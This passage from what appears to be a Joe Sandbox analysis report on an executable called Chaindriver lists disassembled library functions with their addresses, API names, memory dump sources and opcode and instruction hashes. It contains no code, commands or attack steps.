                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction ID: 66b4f5e5c692d2a92369be1aaad079ae9989ec4664456e977a181d93c95682f1
                                                    • Opcode Fuzzy Hash: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction Fuzzy Hash: 77016956E1868581FA24A724EC8526EB361FBC5B90FD05235D79D07BA5DE3CE1408A24
                                                    Function 00007FF720B614D8 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF720B61584: GetModuleHandleW.KERNEL32(?,?,?,00007FF720B614F3,?,?,?,00007FF720B618AA), ref: 00007FF720B615AB
                                                    • DloadProtectSection.DELAYIMP ref: 00007FF720B61549
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DloadHandleModuleProtectSection
                                                    • String ID:
                                                    • API String ID: 2883838935-0
                                                    • Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction ID: 6082c2d947318056abb3906f431243c4c960c93e779089d6dd82963f6f96aaeb
                                                    • Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction Fuzzy Hash: 5C117865D0854B82FF75BB15AC56378D260EF64348F990439C90F867A1DF3CB6998E30
                                                    Function 00007FF720B6F984 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                    • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction ID: 53df706ad34b87add0d0df29da0c6c21a5f89443ec7cf8bdd4882d0572d3af49
                                                    • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction Fuzzy Hash: 34F04959B1A20751FE7576A69D1A3BDD291DF99B80F8C4439CA0F863C5EE1CF8808A30